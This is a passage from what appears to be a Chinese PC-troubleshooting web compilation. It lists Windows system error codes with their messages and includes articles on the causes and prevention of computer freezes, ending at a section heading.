            1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
            1019 0x03FB 系统无法配置系统登录记录所需的空间。
            1020 0x03FC 无法在已经有子机码或数值的系统登录机码建立符号连结。
            1021 0x03FD 无法在临时机码下建立永久的子机码。
            1022 0x03FE 变更要求的通知完成，但信息 并未透过呼叫者的缓冲区传
回。呼叫者现在需要自行列举档案，找出变更的地方。
            1051 0x041B 停止控制已经传送给其它服务 所依峙的一个服务。
            1052 0x041C 要求的控制对此服务无效
            1052 0x041C 要求的控制对此服务无效
            1053 0x041D The service did not respond to the start or control
request in a timely fashion. 1054 0x041E 无法建立服务的执行绪。
            1055 0x041F 服务数据库被锁定。
            1056 0x0420 这种服务已经在执行。
            1057 0x0421 帐户名称错误或者不存在。
            1058 0x0422 指定的服务暂停作用，无法激活。
            1059 0x0423 指定循环服务从属关系。
            1060 0x0424 指定的服务不是安装进来的服务。
            1061 0x0425 该服务项目此时无法接收控制讯息。
            1062 0x0426 服务尚未激活。
            1063 0x0427 无法联机到服务控制程序。
            1064 0x0428 处理控制要求时，发生意外状况。
            1065 0x0429 指定的数据库不存在。
            1066 0x042A 服务传回专属于服务的错误码。
            1067 0x042B The process terminated unexpectedly.
            1068 0x042C 从属服务或群组无法激活。
            1069 0x042D 因为登入失败，所以没有激活服务。
            1070 0x042E 在激活之后，服务在激活状态时当机。
            1071 0x042F 指定服务数据库锁定无效。
            1072 0x0430 指定的服务已经标示为删除。
            1073 0x0431 指定的服务已经存在。
            1074 0x0432 系统目前正以上一次执行成功的组态执行。
            1075 0x0433 从属服务不存在，或已经标示为删除。
            1076 0x0434 目前的激活已经接受上一次执行成功的 控制设定。
            1077 0x0435 上一次激活之后，就没有再激活服务。
            1078 0x0436 指定的名称已经用于服务名称或服务显示 名称。
            1100 0x044C 已经到了磁带的最后。
            1101 0x044D 到了档案标示。
            1102 0x044E 遇到磁带的开头或分割区。
            1100 0x044C 已经到了磁带的最后。
            1101 0x044D 到了档案标示。
            1102 0x044E 遇到磁带的开头或分割区。
            1103 0x044F 到了档案组的结尾。
            1104 0x0450 磁带没有任何资料。
            1105 0x0451 磁带无法制作分割区。
            1106 0x0452 存取多重容体的新磁带时，发现目前 区块大小错误。
            1107 0x0453 加载磁带时，找不到磁带分割区信息。
            1108 0x0454 无法锁住储存媒体退带功能。
            1108 0x0454 无法锁住储存媒体退带功能。
            1109 0x0455 无法解除加载储存媒体。
            1110 0x0456 磁盘驱动器中的储存媒体已经变更。
            1111 0x0457 已经重设 I/O 总线。
            1112 0x0458 磁盘驱动器没有任何储存媒体。
            1113 0x0459 目标 multi-byte code page，没有对应 Unicode 字符。
            1114 0x045A 动态链接库 (DLL) 起始例程失败。
            1115 0x045B 系统正在关机。
            1116 0x045C 无法中止系统关机，因为没有关机的动作在进行中。
            1117 0x045D 因为 I/O 装置发生错误，所以无法执行要求。
            1118 0x045E 序列装置起始失败，会取消加载序列驱动程序。
            1119 0x045F 无法开启装置。这个装置与其它装置共享岔断要求 (IRQ)。
至少已经有一个使用同一IRQ 的其它装置已经开启。
            1120 0x0460 A serial I/O operation was completed by another
write to the serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.)
            1121 0x0461 因为已经过了逾时时间，所以序列 I/O 作业完成。
(IOCTL_SERIAL_XOFF_COUNTER 不是零。)
            1122 0x0462 在磁盘找不到任何的 ID 地址标示。
            1123 0x0463 磁盘扇区 ID 字段与磁盘控制卡追踪地址 不符。
            1124 0x0464 软式磁盘驱动器控制卡回报了一个软式磁盘驱动器驱动程序
无法识别的错误。
            1125 0x0465 软式磁盘驱动器控制卡传回与缓存器中不一致的结果。
            1126 0x0466 存取硬盘失败，重试后也无法作业。
            1127 0x0467 存取硬盘失败，重试后也无法作业。
            1128 0x0468 存取硬盘时，必须重设磁盘控制卡，但是 连重设的动作也
失败。
            1129 0x0469 到了磁带的最后。
            1130 0x046A 可用服务器储存空间不足，无法处理这项指令。
            1131 0x046B 发现潜在的死锁条件。
            1132 0x046C 指定的基本地址或档案位移没有适当 对齐。
            1140 0x0474 尝试变更系统电源状态，但其它的应用程序或驱动程序拒
绝。
            1141 0x0475 系统 BIOS 无法变更系统电源状态。
            1150 0x047E 指定的程序需要新的 Windows 版本。
            1151 0x047F 指定的程序不是 Windows 或 MS-DOS 程序。
            1152 0x0480 指定的程序已经激活，无法再激活一次。
            1153 0x0481 指定的程序是为旧版的 Windows 所写的。
            1154 0x0482 执行此应用程序所需的链接库档案之一毁损。
            1155 0x0483 没有应用程序与此项作业的指定档案建立关联。
            1156 0x0484 传送指令到应用程序发生错误。
            1157 0x0485 找不到执行此应用程序所需的链接库档案。
            1200 0x04B0 指定的装置名称无效。
            1201 0x04B1 装置现在虽然未联机，但是它是一个记忆联机。
            1202 0x04B2 尝试记忆已经记住的装置。
            1203 0x04B3 提供的网络路径找不到任何网络提供程序。
            1203 0x04B3 提供的网络路径找不到任何网络提供程序。
            1204 0x04B4 指定的网络提供程序名称错误。
            1205 0x04B5 无法开启网络联机设定文件。
            1206 0x04B6 网络联机设定文件坏掉。
            1207 0x04B7 无法列举非容器。
            1208 0x04B8 发生延伸的错误。
            1209 0x04B9 指定的群组名称错误。
            1210 0x04BA 指定的计算机名称错误。
            1211 0x04BB 指定的事件名称错误。
            1212 0x04BC 指定的网络名称错误。
            1213 0x04BD 指定的服务名称错误。
            1214 0x04BE 指定的网络名称错误。
            1215 0x04BF 指定的资源共享名称错误。
            1216 0x04C0 指定的密码错误。
            1217 0x04C1 指定的讯息名称错误。
            1218 0x04C2 指定的讯息目的地错误。
            1219 0x04C3 所提供的条件与现有的条件组发生冲突。
            1220 0x04C4 尝试与网络服务器联机，但是 与该服务器的联机已经太
多。
            1221 0x04C5 其它网络计算机已经在使用这个工作群组或网域名称。


导致计算机系统“死机”的原因及其预防方法

《一键清理系统垃圾》

导致计算机系统“死机”的原因及其预防方法

    如今的计算机已经接近全面普及的程度了，它给人们在工作和学习上提供了极大的方便，不过，计算机的“死机”对于普通的计算机用户来说，却成为了一个解不开、挣不脱的烦 恼。每当在计算机开机时、或启动操作系统时、或使用一些应用程序时、或正准备退出操作系统时，“死机”这一头“猛兽”随时都有可能迎面扑来。那么，怎么做才能避免计算机“死机”的烦恼呢？下面，笔者就根据导致“死机”的原因和预防的方法分为几点给大家介绍一下，希望下面的文章能给遇到此类问题的朋友一些帮助。

     一、导致计算机“死机”的原因：

     1．BIOS设置不当所造成的“死机”

     每种硬件有自己默认或特定的工作环境，不能随便超越它的工作权限进行设置，否则就会因为硬件达不到这个要求而死机。例如：一款内存条只能支持到DDR 266，而在BIOS设置中却将其设为DDR 333的规格，这样做就会因为硬件达不到要求而死机，如果就算是能在短时间内正常的工作，电子元件也会随着使用时间的增加而逐渐老化，产生的质量问题也会导致计算机频繁的“死机”。

     2．硬件或软件的冲突所造成的“死机”

     计算机硬件冲突的“死机”主要是由中断设置的冲突而造成的，当发生硬件冲突的时候，虽然各个硬件勉强可以在系统中共存，但是不能同时的进行工作，比如能够上网的时候就不能听音乐等等。时间一长，中断的冲突就会频频的出现，最后将导致系统不堪重负，造成“死机”。

     同样，软件也存在这种情况。由于不同的软件公司开发的软件越来越多，且这些软件在开发的过程中不可能做到彼此之间的完全熟悉和配合，因此，当一起运行这些软件的时候，很容易就发生大家都同时调用同一个DLL或同一段物理地址，从而发生冲突。此时的计算机系统由于不知道该优先处理哪个请求，造成了系统紊乱而致使计算机“死机”。

     3．硬件的品质和故障所造成的“死机”

     由于目前一些小品牌的计算机硬件产品往往没经过合格的检验程序就投放市场，其中，有很多质量不过关的硬件产品在品质完好计算机硬件的笼罩下是非常隐蔽的，普通人是不容易看出来的。就这些硬件产品来说，造成计算机经常“死机”的原因和它们有着非常直接的关系。另外，还有些硬件的故障是由于使用的年限太久而产生的。一般来说，内存条、CPU和硬盘等部件的寿命在超过三年后就很难保证了，从而也会产生很多隐蔽的“死机”问题。

     4．计算机系统源耗尽所造成的“死机”

     当计算机系统执行了错误的程序或代码时，会使系统的内部形成“死”循环的现象，原本就非常有限的系统资源会被投入到无穷无尽的重复运算当中，当运算到最后会因为计算机过大的使资源耗尽而造成“死机”。还有一点就是，在计算机操作系统中运行了大量的程序，使得系统内存资源不足而造成“死机”。

    5．系统文件遭到破坏所造成的“死机”

     系统文件主要是指在计算机系统启动或运行时起着关键性支持的文件，如果缺少了它们，整个计算机系统将无法正常的运行，当然“死机”也就在所难免了。造成系统文件被破坏的原因有很多，病毒和黑客程序的入侵是最主要的原因。另外，初级用户由于错误操作，删除了系统文件也会造成这种后果。

     6．计算机内部散热不良所造成的“死机”

     由于计算机内部的电子元器件的主要成分是硅（这是一种工作状态受温度影响很大的元素）。在计算机工作时电子元器件的温度就会随之而增高，其表面会发生电子迁移现象，从而改变当前工作状态，造成计算机在工作中突然“死机”。

     7．初级用户的错误操作所造成的“死机”

     对初级用户而言，在使用计算机过程中一些错误的操作也会造成系统的“死机”。比如热插拔硬件、在运行过程中震动计算机、随意删除文件或安装了超过基本硬件设置标准的软件等都可以造成“死机”。

     8．其他方面造成的“死机”

     除了笔者在上面所叙述的原因之外，还有很多千奇百怪的原因可能导致系统的“死机”。比如电压波动过大、光驱读盘能力下降、软盘质量不良、病毒或黑客程序的破坏等等原因。总之，导致计算机死机的原因是多方面的。

     从上面的几点可见，计算机“死机”对一般用户来说并不是什么好事，不过也不是不可避免的，只要用户按照正常的电脑操作，相信“死机”的机率就会减小到最少。下面，笔者就计算机死机的原因所总结的一些经验给大家介绍一下。

     二、计算机“死机”的预防

     1．保证正确的Bios设置。Bios里面的设置一定要合适，错误的Bios设置会使你在运行Windows的时候死机。

     2．经常检查电脑配件接触情况。在板卡接触不良的情况下运行会引起系统死机，因此在更换电脑配件时，一定要使板卡与主机板充分接触。

     3．定期清洁机箱。灰尘太多会使板卡之间接触不良，引起系统在运行中死机，因此机箱要随时清洁，不要让太多的灰尘积存在机箱中。

     4．坚持认真查杀病毒。对来历不明的光盘或软盘，不要轻易使用，对邮件中的附件，要先用杀毒软件检查后再打开。

     5．按正确的操作顺序关机。在应用软件未正常结束运行前，别关闭电源，否则会造成系统文件损坏或丢失，引起在启动或运行中死机。

     6．避免多任务同时进行。在执行磁盘整理或用杀毒软件检查硬盘期间，不要运行其他软件，否则会造成死机。

     7．勿过分求新。各种硬件的驱动不一定要随时更新，因为才开发的驱动程序往往里面有bug，会对系统造成损害，引起系统死机，最新的不一定是最好的。

     8．在卸载软件时，用自带的反安装程序或Windows里面的安装/卸载方式，不要直接删除程序文件夹，因为某些文件可能被其他程序共享，一旦删除这些共享文件，会造成应用软件无法使用而死机。

     9．设置硬件设备时，最好检查有无保留中断（IRQ），不要让其他设备使用该中断号，以免引起中断冲突，造成系统死机。

     10．在上网冲浪的时候，不要打开太多的浏览器窗口，否则会导致系统资源不足，引起系统死机。

     11．如果你的机器内存不是很大，千万不要运行占用内存较大的程序，如Photoshop，否则运行时容易死机。

     12．对于系统文件或重要的文件，最好使用隐含属性，这样才不至于因错误操作删除这些文件，引起系统死机。

     13．修改硬盘主引导记录时，最好先保存原来的记录，防止因修改失败而无法恢复原来的引导记录。

     14．CPU、显卡等配件一般不要超频，若确实需要超，要注意超频后板卡的温度，CPU、显卡等长期在非正常频率和温度下工作轻则自动重启或死机，重者烧毁CPU、显卡、主板。


电脑故障维修判断指导大全蓝屏解读

《一键清理系统垃圾》

电脑故障维修判断指导大全蓝屏解读

5 0x0005 拒绝存取。
6 0x0006 无效的代码。
7 0x0007 储存体控制区块已毁。
8 0x0008 储存体空间不足，无法处理这个指令。
9 0x0009 储存体控制区块位址无效。
10 0x000A 环境不正确。
11 0x000B 尝试载入一个格式错误的程式。
12 0x000C 存取码错误。
13 0x000D 资料错误。
14 0x000E 储存体空间不够，无法完成这项作业。
15 0x000F 系统找不到指定的磁碟机。
16 0x0010 无法移除目录。
17 0x0011 系统无法将档案移到 其他的磁碟机。
18 0x0012 没有任何档案。
19 0x0013 储存媒体为防写状态。
20 0x0014 系统找不到指定的装置。
21 0x0015 装置尚未就绪。
22 0x0016 装置无法识别指令。
23 0x0017 资料错误 (cyclic redundancy check) 24 0x0018 程式发出一个长 度错误的指令。
25 0x0019 磁碟机在磁碟找不到 持定的磁区或磁轨。
26 0x001A 指定的磁碟或磁片无法存取。
27 0x001B 磁碟机找不到要求的磁区。
28 0x001C 印表机没有纸。
29 0x001D 系统无法将资料写入指定的磁碟机。
30 0x001E 系统无法读取指定的装置。
31 0x001F 连接到系统的某个装置没有作用。
32 0x0020 The process cannot access the file because it is being used by
another process.
33 0x0021 档案的一部份被锁定， 现在无法存取。
34 0x0022 磁碟机的磁片不正确。 请将 %2 (Volume Serial Number: %3) 插入磁碟
机%1。
36 0x0024 开启的分享档案数量太多。
38 0x0026 到达档案结尾。
39 0x0027 磁碟已满。
50 0x0032 不支援这种网路要求。
51 0x0033 远端电脑无法使用。
52 0x0034 网路名称重复。
53 0x0035 网路路径找不到。
54 0x0036 网路忙碌中。
55 0x0037 The specified network resource or device is no longer available.
56 0x0038 The network BIOS command limit has been reached. 57 0x0039 网路配接卡发生问题。
58 0x003A 指定的伺服器无法执行要求的作业。
59 0x003B 网路发生意外错误。
60 0x003C 远端配接卡不相容。
61 0x003D 印表机伫列已满。
62 0x003E 伺服器的空间无法储存等候列印的档案。
63 0x003F 等候列印的档案已经删除。
64 0x0040 指定的网路名称无法使用。
65 0x0041 拒绝存取网路。
66 0x0042 网路资源类型错误。
67 0x0043 网路名称找不到。
68 0x0044 超过区域电脑网路配接卡的名称限制。
69 0x0045 超过网路 BIOS 作业阶段的限制。
70 0x0046 远端伺服器已经暂停或者正在起始中。
71 0x0047 由於连线数目已达上限，此时无法再连线到这台远端电脑。
72 0x0048 指定的印表机或磁碟装置已经暂停作用。
80 0x0050 档案已经存在。
82 0x0052 无法建立目录或档案。
83 0x0053 INT 24失败
84 0x0054 处理这项要求的储存体无法使用。
85 0x0055 近端装置名称已经在使用中。
86 0x0056 指定的网路密码错误。
87 0x0057 参数错误。
88 0x0058 网路发生资料写入错误。
89 0x0059 此时系统无法执行其他行程。
100 0x0064 无法建立其他的系统 semaphore。 101 0x0065 属於其他行程专用的 semaphore 。
102 0x0066 semaphore 已经设定，而且无法关闭。
103 0x0067 无法指定 semaphore 。
104 0x0068 在岔断时间无法要求专用的 semaphore 。
105 0x0069 此 semaphore 先前的拥有权已经结束。
106 0x006A 请将磁片插入 %1。
107 0x006B 因为代用的磁片尚未插入，所以程式已经停止。
108 0x006C 磁碟正在使用中或被锁定。
109 0x006D Pipe 已经中止。
110 0x006E 系统无法开启指定的 装置或档案。
111 0x006F 档名太长。
112 0x0070 磁碟空间不足。
113 0x0071 没有可用的内部档案识别字。
114 0x0072 目标内部档案识别字不正确。
117 0x0075 由应用程式所执行的 IOCTL 呼叫 不正确。
118 0x0076 写入验证参数值不正确。
119 0x0077 系统不支援所要求的指令。
120 0x0078 此项功能仅在 Win32 模式有效。
121 0x0079 semaphore 超过逾时期间。
122 0x007A 传到系统呼叫的资料区域 太小。
123 0x007B 档名、目录名称或储存体标签语法错误。
124 0x007C 系统呼叫层次不正确。
125 0x007D 磁碟没有设定标签。
126 0x007E 找不到指定的模组。
127 0x007F 找不到指定的程序。
128 0x0080 没有子行程可供等待。
129 0x0081 %1 这个应用程式无法在 Win32 模式下执行。
130 0x0082 Attempt to use a file handle to an open disk partition for an
operation other than raw disk I/O.
131 0x0083 尝试将档案指标移至档案开头之前。
132 0x0084 无法在指定的装置或档案，设定档案指标。
133 0x0085 JOIN 或 SUBST 指令 无法用於 内含事先结合过的磁碟机。
134 0x0086 尝试在已经结合的磁碟机，使用 JOIN 或 SUBST 指令。
135 0x0087 尝试在已经替换的磁碟机，使 用 JOIN 或 SUBST 指令。
136 0x0088 系统尝试删除 未连结过的磁碟机的连结关系。
137 0x0089 系统尝试删除 未替换过的磁碟机的替换关系。
138 0x008A 系统尝试将磁碟机结合到已经结合过之磁碟机的目录。
139 0x008B 系统尝试将磁碟机替换成已经替换过之磁碟机的目录。
140 0x008C 系统尝试将磁碟机替换成已经替换过之磁碟机的目录。
141 0x008d系统尝试将磁碟机 SUBST 成已结合的磁碟机 目录。
142 0x008E 系统此刻无法执行 JOIN 或 SUBST。
143 0x008F 系统无法将磁碟机结合或替换同一磁碟机下目录。
144 0x0090 这个目录不是根目录的子目录。
145 0x0091 目录仍有资料。
146 0x0092 指定的路径已经被替换过。
147 0x0093 资源不足，无法处理这项 指令。
148 0x0094 指定的路径这时候无法使用。
149 0x0095 尝试要结合或替换的磁碟机目录，是已经替换过的的目标。
150 0x0096 CONFIG.SYS 档未指定系统追踪资讯，或是追踪功能被取消。
151 0x0097 指定的 semaphore事件 DosMuxSemWait 数目不正确。
152 0x0098 DosMuxSemWait 没有执行；设定太多的 semaphore。 153 0x0099 DosMuxSemWait 清单不正确。
154 0x009A 您所输入的储存媒体标 元长度限制。
155 0x009B 无法建立其他的执行绪。
156 0x009C 接收行程拒绝接受信号。
157 0x009D 区段已经被舍弃，无法被锁定。
158 0x009E 区段已经解除锁定。
159 0x009F 执行绪识别码的位址不正确。
160 0x00A0 传到 DosExecPgm 的引数字串不正确。
161 0x00A1 指定的路径不正确。
162 0x00A2 信号等候处理。
164 0x00A4 系统无法建立执行绪。
167 0x00A7 无法锁定档案的部份范围。
170 0x00AA 所要求的资源正在使用中。
173 0x00AD 取消范围的锁定要求不明显。
174 0x00AE 档案系统不支援自动变更锁定类型。
180 0x00B4 系统发现不正确的区段号码。
182 0x00B6 作业系统无法执行 %1。
183 0x00B7 档案已存在，无法建立同一档案。
186 0x00BA 传送的旗号错误。
187 0x00BB 指定的系统旗号找不到。
188 0x00BC 作业系统无法执行 %1。
189 0x00BD 作业系统无法执行 %1。
190 0x00BE 作业系统无法执行 %1。
191 0x00BF 无法在 Win32 模式下执行 %1。
192 0x00C0 作业系统无法执行 %1。
193 0x00C1 %1 不是正确的 Win32 应用程式。
194 0x00C2 作业系统无法执行 %1。
195 0x00C3 作业系统无法执行 %1。
196 0x00C4 作业系统无法执行 这个应用程式。
197 0x00C5 作业系统目前无法执行 这个应用程式。
198 0x00C6 作业系统无法执行 %1。
199 0x00C7 作业系统无法执行 这个应用程式。
200 0x00C8 程式码的区段不可以大於或等於 64KB。
201 0x00C9 作业系统无法执行 %1。
202 0x00CA 作业系统无法执行 %1。
203 0x00CB 系统找不到输入的环境选项。 \\r
205 0x00CD 在指令子目录下，没有任何行程有信号副处理程式。
206 0x00CE 档案名称或副档名太长。
207 0x00CF ring 2 堆叠使用中。
208 0x00D0 输入的通用档名字元 * 或 ? 不正确， 或指定太多的通用档名字元。
209 0x00D1 所传送的信号不正确。
210 0x00D2 无法设定信号处理程式。
212 0x00D4 区段被锁定，而且无法重新配置。
214 0x00D6 附加到此程式或动态连结模组的动态连结模组太多。
215 0x00D7 Can`t nest calls to LoadModule.
230 0x00E6 The pipe state is invalid.
231 0x00E7 所有的 pipe instances 都在忙碌中。
232 0x00E8 The pipe is being closed.
233 0x00E9 No process is on the other end of the pipe.
234 0x00EA 有更多可用的资料。
240 0x00F0 作业阶段被取消。
254 0x00FE 指定的延伸属性名称无效。
255 0x00FF 延伸的属性不一致。
259 0x0103 没有可用的资料。
266 0x010A 无法使用 Copy API。
267 0x010B 目录名称错误。
275 0x0113 延伸属性不适用於缓冲区。
276 0x0114 在外挂的档案系统上的延伸属性档案已经毁损。
277 0x0115 延伸属性表格档满。
278 0x0116 指定的延伸属性代码无效。
282 0x011A 外挂的这个档案系统不支援延伸属性。
288 0x0120 意图释放不属於叫用者的 mutex。
298 0x012A semaphore 传送次数过多。
299 0x012B 只完成 Read/WriteProcessMemory 的部份要求。
317 0x013D 系统找不到位於讯息档 %2 中编号为 0x%1 的讯息。
487 0x01E7 尝试存取无效的位址。
534 0x0216 运算结果超过 32 位元。
535 0x0217 通道的另一端有一个行程在接送资料。
536 0x0218 等候行程来开启通道的另一端。
994 0x03E2 存取延伸的属性被拒。
995 0x03E3 由於执行绪结束或应用程式要求，而异常终止 I/O 作业。
996 0x03E4 重叠的 I/O 事件不是设定成通知状态。
997 0x03E5 正在处理重叠的 I/O 作业。
998 0x03E6 对记忆体位置的无效存取。
999 0x03E7 执行 inpage 作业发生错误。
1002 0x03EA 视窗无法用来传送讯息。
1003 0x03EB 无法完成这项功能。
1004 0x03EC 旗号无效。
1005 0x03ED 储存媒体未含任何可辨识的档案系统。 请确定以载入所需的系统驱动
程式，而且该储存媒体并未毁损。
1006 0x03EE 储存该档案的外部媒体发出警告， 表示该已开启档案已经无效。
1007 0x03EF 所要求的作业无法在全萤幕模式下执行。
1008 0x03F0 An attempt was made to reference a token that does not exist.
1009 0x03F1 组态系统登录资料库毁损。
1010 0x03F2 组态系统登录机码无效。
1011 0x03F3 无法开启组态系统登录机码。
1012 0x03F4 无法读取组态系统登录机码。
1013 0x03F5 无法写入组态系统登录机码。
1014 0x03F6 系统登录资料库中的一个档案必须使用记录或其他备份还原。 已经还
原成功。
1015 0x03F7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映对记忆体 内
容毁损、会是档案无法复原。
1016 0x03F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录无法读入、
写出或更新，其中的一个档案 内含系统登录在记忆体中的内容。
1017 0x03F9 系统尝试将档案载入系统登录或将档案还原到系统登录中， 但是，指
定档案的格式不是系统登录档的格式。
1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的xx作。
1019 0x03FB 系统无法配置系统登录记录所需的空间。
1020 0x03FC 无法在已经有子机码或数值的系统登录机码建立符号连结。
1021 0x03FD 无法在临时机码下建立永久的子机码。
1022 0x03FE 变更要求的通知完成，但资讯 并未透过呼叫者的缓冲区传回。呼叫者
现在 需要自行列举档案，找出变更的地方。
1051 0x041B 停止控制已经传送给其他服务 所依峙的一个服务。
1052 0x041C 要求的控制对此服务无效
1053 0x041D The service did not respond to the start or control request in
a timely fashion. 1054 0x041E 无法建立服务的执行绪。
1055 0x041F 服务资料库被锁定。
1056 0x0420 这种服务已经在执行。
1057 0x0421 帐户名称错误或者不存在。
1058 0x0422 指定的服务暂停作用，无法启动。
1059 0x0423 指定循环服务从属关系。
1060 0x0424 指定的服务不是安装进来的服务。
1061 0x0425 该服务项目此时无法接收控制讯息。
1062 0x0426 服务尚未启动。
1063 0x0427 无法连线到服务控制程式。
1064 0x0428 处理控制要求时，发生意外状况。
1065 0x0429 指定的资料库不存在。
1066 0x042A 服务传回专属於服务的错误码。
1067 0x042B The process terminated unexpectedly.
1068 0x042C 从属服务或群组无法启动。
1069 0x042D 因为登入失败，所以没有启动服务。
1070 0x042E 在启动之後，服务在启动状态时当机。
1071 0x042F 指定服务资料库锁定无效。
1072 0x0430 指定的服务已经标示为删除。
1073 0x0431 指定的服务已经存在。
1074 0x0432 系统目前正以上一次执行成功的组态执行。
1075 0x0433 从属服务不存在，或已经标示为删除。
1076 0x0434 目前的启动已经接受上一次执行成功的 控制设定。
1077 0x0435 上一次启动之後，就没有再启动服务。
1078 0x0436 指定的名称已经用於服务名称或服务显示 名称。
1100 0x044C 已经到了磁带的最後。
1101 0x044D 到了档案标示。
1102 0x044E 遇到磁带的开头或分割区。
1103 0x044F 到了档案组的结尾。
1104 0x0450 磁带没有任何资料。
1105 0x0451 磁带无法制作分割区。
1106 0x0452 存取多重容体的新磁带时，发现目前 区块大小错误。
1107 0x0453 载入磁带时，找不到磁带分割区资讯。
1108 0x0454 无法锁住储存媒体退带功能。
1109 0x0455 无法解除载入储存媒体。
1110 0x0456 磁碟机中的储存媒体已经变更。
1111 0x0457 已经重设 I/O 汇流排。
1112 0x0458 磁碟机没有任何储存媒体。
1113 0x0459 目标 multi-byte code page，没有对应 Unicode 字元。
1114 0x045A 动态连结程式库 (DLL) 起始常式失败。
1115 0x045B 系统正在关机。
1116 0x045C 无法中止系统关机，因为没有关机的动作在进行中。
1117 0x045D 因为 I/O 装置发生错误，所以无法执行要求。
1118 0x045E 序列装置起始失败，会取消载入序列驱动程式。
1119 0x045F 无法开启装置。这个装置与其他装置共用岔断要求 (IRQ)。 至少已经
有一个使用同一IRQ 的其他装置已经开启。
1120 0x0460 A serial I/O operation was completed by another write to the serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.)
1121 0x0461 因为已经过了逾时时间，所以序列 I/O 作业完成。
(IOCTL_SERIAL_XOFF_COUNTER 不是零。)
1122 0x0462 在磁片找不到任何的 ID 位址标示。
1123 0x0463 磁片磁区 ID 栏位与磁片控制卡追踪位址 不符。
1124 0x0464 软式磁碟机控制卡回报了一个软式磁碟机驱动程式无法识别 的错误。
1125 0x0465 软式磁碟机控制卡传回与暂存器中不一致的结果。
1126 0x0466 存取硬碟失败，重试後也无法作业。
1127 0x0467 存取硬碟失败，重试後也无法作业。
1128 0x0468 存取硬碟时，必须重设磁碟控制卡，但是 连重设的动作也失败。
1129 0x0469 到了磁带的最後。
1130 0x046A 可用伺服器储存空间不足，无法处理这项指令。
1131 0x046B 发现潜在的锁死条件。
1132 0x046C 指定的基本位址或档案位移没有适当 对齐。
1140 0x0474 尝试变更系统电源状态，但其他的应用程式或驱动程式拒绝。
1141 0x0475 系统 BIOS 无法变更系统电源状态。
1150 0x047E 指定的程式需要新的 Windows 版本。
1151 0x047F 指定的程式不是 Windows 或 MS-DOS 程式。
1152 0x0480 指定的程式已经启动，无法再启动一次。
1153 0x0481 指定的程式是为旧版的 Windows 所写的。
1154 0x0482 执行此应用程式所需的程式库档案之一毁损。
1155 0x0483 没有应用程式与此项作业的指定档案建立关联。
1156 0x0484 传送指令到应用程式发生错误。
1157 0x0485 找不到执行此应用程式所需的程式库档案。
1200 0x04B0 指定的装置名称无效。
1201 0x04B1 装置现在虽然未连线，但是它是一个记忆连线。
1202 0x04B2 尝试记忆已经记住的装置。
1203 0x04B3 提供的网路路径找不到任何网路提供程式。
1204 0x04B4 指定的网路提供程式名称错误。
1205 0x04B5 无法开启网路连线设定档。
1206 0x04B6 网路连线设定档坏掉。
1207 0x04B7 无法列举非容器。
1208 0x04B8 发生延伸的错误。
1209 0x04B9 指定的群组名称错误。
1210 0x04BA 指定的电脑名称错误。
1211 0x04BB 指定的事件名称错误。
1212 0x04BC 指定的网路名称错误。
1213 0x04BD 指定的服务名称错误。
1214 0x04BE 指定的网路名称错误。
1215 0x04BF 指定的资源分享名称错误。
1216 0x04C0 指定的密码错误。
1217 0x04C1 指定的讯息名称错误。
1218 0x04C2 指定的讯息目的地错误。
1219 0x04C3 所提供的条件与现有的条件组发生冲突。
1220 0x04C4 尝试与网路伺服器连线，但是 与该伺服器的连线已经太多。
1221 0x04C5 其他网路电脑已经在使用这个工作群组或网域名称。
1222 0x04C6 网路没有显示出来或者没有启动。
1223 0x04C7 使用者已经取消作业。
1224 0x04C8 要求的作业无法在已经开启使用者对应区段的档案执行。
1225 0x04C9 远端系统拒绝网路连线。
1226 0x04CA 关闭网路连线。
1227 0x04CB 网路传输端点已经有相关连的位址。
1228 0x04CC 位址尚未有相关的网路端点。
1229 0x04CD 尝试在不存在的网路连线作业。
1230 0x04CE 在作用中的网路连线上执行无效的作业。
1231 0x04CF 无法传输到远端网路。
1232 0x04D0 无法连线到远端系统。
1233 0x04D1 远端系统不支援传输通讯协定。
1234 0x04D2 远端系统的目的地网路端点没有作何执行中的服务。
1235 0x04D3 要求已经中止。
1236 0x04D4 进端系统已经中断网路连线。
1237 0x04D5 无法完成作业，请重试。
1238 0x04D6 无法与伺服器连线，原因是这个帐户已经到达同时连线数目 的上限。
1239 0x04D7 尝试在这个帐户未授权的时间登入网路。
1240 0x04D8 这个帐户无法从这个地方登入网路。
1241 0x04D9 网路位址无法用於这个要求的作业。
1242 0x04DA 服务已经登记。
1243 0x04DB 指定的服务不存在。
1244 0x04DC 作业无法执行，原因是使用者尚未授权使用。
1245 0x04DD 要求的作业无法执行，原因是使用者尚未登入网路。 指定的服务不存
在。
1246 0x04DE 传回要求呼叫者继续工作的讯息。
1247 0x04DF 在完成起始作业之後，尝试再执行起始作业。
1248 0x04E0 没有其他的近端装置。


电脑死机的原因

《一键清理系统垃圾》

电脑死机的原因

1、硬件方面
   设备不匹配，如主板主频和CPU主频不匹配，主板主频太高或太低都可能导致频繁死机。
   软硬件难于兼容或无法兼容，如运行Photoshop、AutoCAD等软件时，AMD K6的CPU就要比老赛扬CPU效果好。
   板、卡接触不良、松动，或插槽、显示卡、内存、CPU等配件损坏。
   电压太低或太高，这可能是由于电源故障，也可能是由于外部电源不稳所致。
   磁盘存在坏道、坏扇区或坏簇，磁盘老化或由于外部电源不稳所致。
   CPU散热不畅或超频太高。
   磁头或光头读取能力不足，由于工作环境不良等原因都会导致磁头读取能力下降。
   内存条故障或容量不够，如内存条松动、虚焊或内存芯片本身质量问题。
   某些配件已经损坏，但即插即用的技术使系统在启动时仍检测这些设备导致死机。
2、软件方面
   病毒干扰，病毒可以使计算机工作效率急剧下降，造成频繁死机。
   软件兼容不良或无法兼容，应用软件版本和操作系统不匹配，是软件兼容不良最常见的事例。
   误操作，如用非法格式或参数无法打开或释放有关程序。
   内存管理不当，如DOS下Config.sys是个非常重要的文件，直接关系到内存的使用和分配情况。
   缓冲区太多或少，不同的机型、不同的软件环境，对其缓冲区的要求也不同。
   CMOS参数设置不当，CMOS直接设置整个计算机系统硬件参数和使用情况。
   磁盘空间太满，任何时候，硬盘的使用空间都不宜超过或达到总容量的80%。
   Windows 95/98系统需要把硬盘一部分作为虚拟内存，硬盘剩余空间太小，也会导致死机。
   软件的BUG。
   系统System等子目录中动态链接库文件.DLL丢失，造成Windows系统瘫痪。
   错误修改了系统注册表信息，造成Windows系统不能启动。
二、启动时死机
